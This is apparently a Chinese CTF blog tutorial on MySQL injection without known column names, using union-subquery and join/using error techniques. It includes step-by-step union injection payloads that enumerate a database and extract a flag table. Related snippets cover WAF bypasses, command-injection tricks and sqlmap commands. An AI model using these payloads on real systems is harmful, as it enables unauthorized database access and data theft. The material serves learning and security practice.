【未知列名注入】

最新推荐文章于 2025-03-13 22:11:48 发布
最新推荐文章于 2025-03-13 22:11:48 发布
阅读量465 收藏 3
点赞数 7
分类专栏: CTF 文章标签: 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45131319/article/details/142902101
版权

简介

在sql注入中,如果服务器过滤了column_name阻止我们获取列名,我们该如何绕过

一、union 绕过

使用union构造多个表,把数据表和构造的123表连接起来,我们看一下构造过程:
请添加图片描述

请添加图片描述

查询user表数据
select * from user;

Union联合查询,把两个表合在一起
select * from user where id=1 union select 1,2,3;

交换union查询语句的前后顺序,替换列名
select 1,2,3 union select * from user;
子查询
select * from (select 1,2,3 union select * from user)a;

现在就已经构造了一个表,并且有一个别名a,

查询a表的第二列,现在我们没有使用username列,就已经查询到了username列的内容
select a.2 from (select 1,2,3 union select * from user)a;

测试数字型还是字符型sql注入

id=1 输出admin

id=2 输出guest

id=1 and 1%23

页面有三种回显,并且有两种回显是根据id参数来的,那么可以猜测,服务器上是有回显位的,所以可以用union联合查询注入

测试列数
id=1 order by 3%23

测试回显位
id=-1 union select 1,2,3%23

拿库名
id=-1 union select 1,database(),3%23

拿表名
id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

拿列名
id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'%23
被过滤,采用union构造的方式绕过

拿flag
id=1 union select 1,a.2,3 from (select 1,2 union select * from flag)a limit 2,1%23

二、using 绕过

using可以根据指定的列名,把多个表连接起来,我们先复习一下join
请添加图片描述

请添加图片描述

请添加图片描述
我们再看一个例子:
请添加图片描述
在上面报错的基础上,我们加上using(Id)把我们的id列给合并了,合并id后就不会报错id的错误了:

爆第二个列
select * from (select * from user as a join user as b using(id))c;

id列合并一起后,username依旧的重复的,那么会接着报下一个列的错误
请添加图片描述
第三个列同理,我们把报出的已知列继续加入using合并,那么就会继续爆出下一个列的错误:

第三个列
select * from (select * from user as a join user as b using(id,username))c;

请添加图片描述

练习join on
select * from user join flag;
select * from user join flag on user.id=flag.id;

练习using
select * from user join flag using(id);

练习子查询
select * from (select 1,1)a;

payload构造练习
连接user表,构造相同的列
select * from user as a join user as b;
在使用别名查询一次,就可以报错
select * from (select * from user as a join user as b)c;
爆第二个列
select * from (select * from user as a join user as b using(id))c;
第三个列
select * from (select * from user as a join user as b using(id,username))c;

三、总结

已经拿到库名,表名;在拿列名的时间,column_name或者columns被过滤,不能适用columns表来拿到列名。当然在column_name,columns等没有被过滤的情况下,也可以适用,只不过稍微麻烦点

Union 主要适用于有回显位的情况,

Using适用于报错的情况,因为using是通过报错信息,把列名信息带出来的

23-5 绕过去除 union 和 select 的 SQL 注入
weixin_43263566的博客
02-07 1252
在MySQL中,默认情况下,数据库名、表名在Unix、Linux系统上是区分大小写的,而在Windows系统上则不区分大小写。但是,SQL语句中的关键字(如SELECT、INSERT)、函数名(如MAX()、COUNT())以及列名和别名通常是不区分大小写的。但是,对于字符串值的比较,默认是区分大小写的。下面,我将简要介绍一些MySQL的基础知识,以及您提到的一些特殊编码和替换技巧。在某些安全性较低的应用场景中,攻击者可能会尝试通过改变查询语句的格式来绕过安全过滤器,执行SQL注入等恶意操作。
Web安全之SQL注入绕过技巧
m0_74131821的博客
04-11 1866
今天跟大家聊聊SQL注入的几种绕过技巧
mysql列名未知注入_MySQL在不知道列名情况下的注入详解
weixin_28754365的博客
02-02 190
前言最近感觉脑子空空,全在为了刷洞去挖洞,还是回归技术的本身让自己舒服些。好了,下面话不多说了,来一起看看详细的介绍吧前提以下情况适用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema库],且已获取到库名和表名① 当只能获取到表名,获取不到列名或者只能获取到无有效内容的列名情况【例如 id】② 当希望通过information_s...
WAF绕过方法2--SQL注入绕过技巧
最新发布
lza20001103的博客
03-13 726
WAF绕过方法2--SQL注入绕过技巧
sql注入利用union来绕过括号过滤
plant1234的博客
04-02 8726
union盲注 当我们在括号被过滤的时候,就不能使用sub(),mid()等多种函数 于是相等union 要想知道uinon的怎么进行盲注,就要了解union 这个给大家看几个mysql的查询语句: 通过这三条语句我们可以看到,我们我利用union将一条数据:1,2,0x69 与查询出来的数据进行降序排序,在排序过程中可以看出用的是ascii码 进行的排序。当我们给的password的ascii值大于admin用户密码的ascii值时,则第一条数据就是我们给的数据。所有就可以判断password的值为
sql注入之无列名注入
m0_68976043的博客
08-05 792
我们在注入的过程中很多时候利用的就是information_schema这个库获取 table_schema table_name, column_name这些数据库内的信息,而在市面上很多厂商的waf会对其进行过滤和黑名单,而我们在不使用information_schema库,那只能去看看mysql中其他与生俱来的库,这个时候sys库就尤为显眼。
MySQL在不知道列名情况下的注入详解
09-09
MySQL在不知道列名情况下的注入详解是一篇关于...总之,MySQL未知列名情况下的注入涉及利用数据库的特性和查询结构,以绕过列名的限制获取数据。了解这些技术有助于提高安全意识,同时也有助于开发更安全的应用程序。
SQL注入:pikachu靶场中的SQL注入通关
qq_68163788的博客
05-24 4168
SQL注入是一种常见的网络攻击技术,攻击者利用应用程序对用户输入数据的处理不当,通过在输入字段中插入恶意的SQL代码,从而实现对数据库的非法访问和控制。通过成功利用SQL注入漏洞,攻击者可以执行未经授权的操作,如删除、修改或获取敏感数据。在pikachu靶场中,玩家需要利用自己的技能和知识,深入了解SQL注入的原理和方法,通过不断尝试和实践,最终成功通关。这个过程不仅可以帮助玩家提升对SQL注入漏洞的识别和防范能力,还能加深对网络安全的理解和认识。
SQL注入:联合查询的三个绕过技巧
qq_68163788的博客
01-26 3162
SQL注入中,可以利用科学计数法来绕过对输入的限制。例如,可以使用科学计数法来绕过对字符串长度的限制,通过将字符串拆分成多个部分并使用科学计数法来表示。此外,还可以利用数据库的特定特性或语法来替代原始的查询语句,从而执行联合查询或其他恶意操作。另外,还可以尝试利用无列名注入的技巧,通过在原始查询中使用通配符或其他方式来绕过列名的限制,从而执行恶意操作。
SQL注入:报错注入
qq_68163788的博客
01-27 3188
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库
SQL注入实战:绕过操作
ting_liang的博客
01-27 3293
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
WAF绕过
2301_78713232的博客
12-07 789
在这里,客户端的第⼀次编码,以及服务端的第⼆次解码,均是由程序员自己设定的,是可控的,可知的。当遇到非ASCII 码表示的字符时,如中⽂,浏览器或通过编写 URLEncode,根据 UTF-8、GBK 等编码 16 进制形式,进行转换,如“春”的 UTF-8 编码为 E6 98 A5,因此其在支持 UTF-8 的情况 下,URL 编码为%E6%98%A5。找到第⼀个字符后继续进行下⼀个字符匹配,从而找到所有的字符串,最后就是要查询的内容,这种SQL 注入语句也不会存在逗号,从而绕过 waf 拦截。
绕过函数方法
qq_50613938的博客
11-03 458
127.0.0.1 & ls ——ll ;查看本地目录 当某一些字符被过滤掉,绕过 “;”分隔符可以使用%0a代替 |,||,&,&&,五个管道符 不加通配符的like可以用来当做=号使用 空格键;/**/ () 回车(url编码中的%0a) `(tap键上面的按钮) tap 两个空格 %0a代替换行,%09代替TAB键(因为flag被过滤了,所以我们通过TAB来补全flag_is_here) %5c代替\(用\来分隔开cat,因为cat也被过滤了qwq)%27是单引号 ca
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 2257
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
union 联查_union联合查询绕过登录的万能密码解析
weixin_39610488的博客
12-19 2052
—————————asp代码—————————————–username = request.form("username") password = request.form("password") set rs=server.createobject("adodb.recordset") sql = "select[password] from admin where UserName='"&a...
SQL注入以及部分绕过方法详解
时乙的博客
09-23 1726
数据库知识补充 1.information_schema数据库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。在information_schema 中,有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。 2.information_schema.schemata表 提供了当前mysql实例中所有数据库的信息,其中需要用到的是 schema_name 这一列,存放的是各个数据库的名称 .
2-4 【实验】11-双写绕过+代码审计
山兔的博客
03-23 1473
今天我们讲的是pass-10,我们用到的思路和我们之前讲sql注入,用到的思路是一样的,我们回想一下之前我们用到的思路 过滤union select,后台做了个单词的替换,将我们的union替换为空,或者替换为其它的一些特殊的字符,这个时候,我们在后台语句的执行中,因为union置换为空,所以产生了语法错误 当时我们有个思路,我们在union中间在加个union uniunionon select 当我们中间这个union被过滤之后,变为空之后,我们这个union就会和前面三个字符,后面两个字符,合并,组
SQL注入绕过
weixin_33858336的博客
12-23 701
一、常用符号的绕过   1、空格 1 空格代替:+ %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 2 括号绕过:常用于基于时间延迟的盲注,例如构造语句: ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23   2、“ = ”号 使用like 、rlike 、reg...
sqlmap爆破列名
01-10
### 使用 SQLMap 进行列名爆破 当目标应用程序存在 SQL 注入漏洞时,可以使用 `sqlmap` 工具自动检测并利用该漏洞。对于列名爆破的具体操作如下: #### 构建基础命令 构建用于测试的目标 URL 命令结构,例如: ```bash sqlmap -u "http://example.com/vulnerable_page.php?id=1" ``` 此命令会尝试探测指定URL中的参数是否存在SQL注入漏洞[^1]。 #### 获取数据库信息 一旦确认了可被攻击的入口点,则可以通过附加选项进一步探索数据存储详情。要获取当前使用的数据库名称,可以在原有基础上增加 `--current-db` 参数: ```bash sqlmap -u "http://example.com/vulnerable_page.php?id=1" --current-db ``` 这一步骤有助于了解正在访问的是哪个具体的数据库实例[^2]。 #### 列举所有表格 明确了所在数据库之后,下一步就是枚举其中包含的所有表单。此时应追加 `-D` 和 `--tables` 参数组合来完成这项任务: ```bash sqlmap -u "http://example.com/vulnerable_page.php?id=1" -D database_name --tables ``` 这里假设已经知道了具体的名字为 `database_name` 的数据库[^3]。 #### 查找特定表内的字段列表 最后,在定位到感兴趣的某张表后(比如名为 `flag`),就可以执行下列指令以提取其内部定义的所有列的信息: ```bash sqlmap -u "http://example.com/vulnerable_page.php?id=1" -D database_name -T table_name --columns ``` 上述命令将会返回所选表内各列的详细描述,从而帮助识别哪些可能是敏感数据所在的列,如用户名、密码哈希等[^4]。 通过以上步骤,能够有效地运用 `sqlmap` 实现对未知架构下的关系型数据库管理系统(RDBMS) 中各个层次组件(库-> 表 -> 列)的自动化挖掘过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值